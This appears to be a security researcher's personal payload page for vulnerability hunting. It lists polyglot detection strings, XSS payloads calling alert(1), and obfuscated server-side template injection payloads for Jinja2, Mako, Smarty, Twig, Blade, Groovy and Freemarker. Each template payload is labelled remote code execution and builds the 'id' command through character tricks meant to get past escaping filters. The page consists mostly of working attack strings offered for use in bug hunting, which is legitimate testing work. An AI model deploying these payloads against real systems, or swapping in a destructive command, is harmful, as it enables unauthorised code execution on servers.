Payloads
A list of payloads that I do use when hunting for vulnerabilities. Personaly, I rarly use exploitation payloads but instead detection payloads.
All payloads shown on this page are created by me. I provide a basic overview of my payloads, exploitation payloads and more advanced detection payloads will not be shared.
Polyglot payloads
This payload focuses on the detection of syntax errors
1
<z>"z'z`%}})z${{z\
This payload focuses on detecting transformation that can be used in future attacks
1
tfmtstart%255Az%5Az\x5Az\u005Az%26%23x5A%3Btfmtend
Cool payloads
This core payload was discoverd by the amazing research garethheyes! You can read more about his research on it here.
I made a few adjustments to it:
1
<script>'<!--<script>'</script>//alert(1)</script>
The Fake comment XSS
1
/\///alert(1)
Server Side Template Injection (SSTI)
Double template rendering payloads
Some of the indexes used in the payload to extract characters for strings may need to be changed depending on the application you are using.
These payloads can be used to bypass
autoescape/html escapefilters.
Jinja2
Impact: Remote Code Execution (RCE)
1
{{self._TemplateReference__context.cycler.__init__.__globals__.os.popen(self.__init__.__globals__.__str__()[150:152]+self.__init__.__globals__.__str__()[694]).read()}}
Mako
Impact: Remote Code Execution (RCE)
1
${self.module.cache.util.os.popen(str().join(chr(i)for(i)in[105,100])).read()}
Smarty
Impact: Remote Code Execution (RCE)
1
{{passthru(implode(Null,array_map(chr(99)|cat:chr(104)|cat:chr(114),[105,100])))}}
Twig
Impact: Remote Code Execution (RCE)
1
{{id~passthru~_context|join|slice(2,2)|split(000)|map(_context|join|slice(5,8))}}
1
{%block U%}id000passthru{%endblock%}{%set x=block(_charset|first)|split(000)%}{{[x|first]|map(x|last)|join}}
Blade
Impact: Remote Code Execution (RCE)
1
{{passthru(implode(Null,array_map(chr(99).chr(104).chr(114),[105,100])))}}
Groovy
Impact: Remote Code Execution (RCE)
1
${x=new String();for(i in[105,100]){x+=((char)i).toString()};x.execute().text}
Freemarker
Impact: Remote Code Execution (RCE)
1
${(6?lower_abc+18?lower_abc+5?lower_abc+5?lower_abc+13?lower_abc+1?lower_abc+18?lower_abc+11?lower_abc+5?lower_abc+18?lower_abc+1.1?c[1]+20?lower_abc+5?lower_abc+13?lower_abc+16?lower_abc+12?lower_abc+1?lower_abc+20?lower_abc+5?lower_abc+1.1?c[1]+21?lower_abc+20?lower_abc+9?lower_abc+12?lower_abc+9?lower_abc+20?lower_abc+25?lower_abc+1.1?c[1]+5?upper_abc+24?lower_abc+5?lower_abc+3?lower_abc+21?lower_abc+20?lower_abc+5?lower_abc)?new()(9?lower_abc+4?lower_abc)}
You can find a lot of great resources related to payloads below.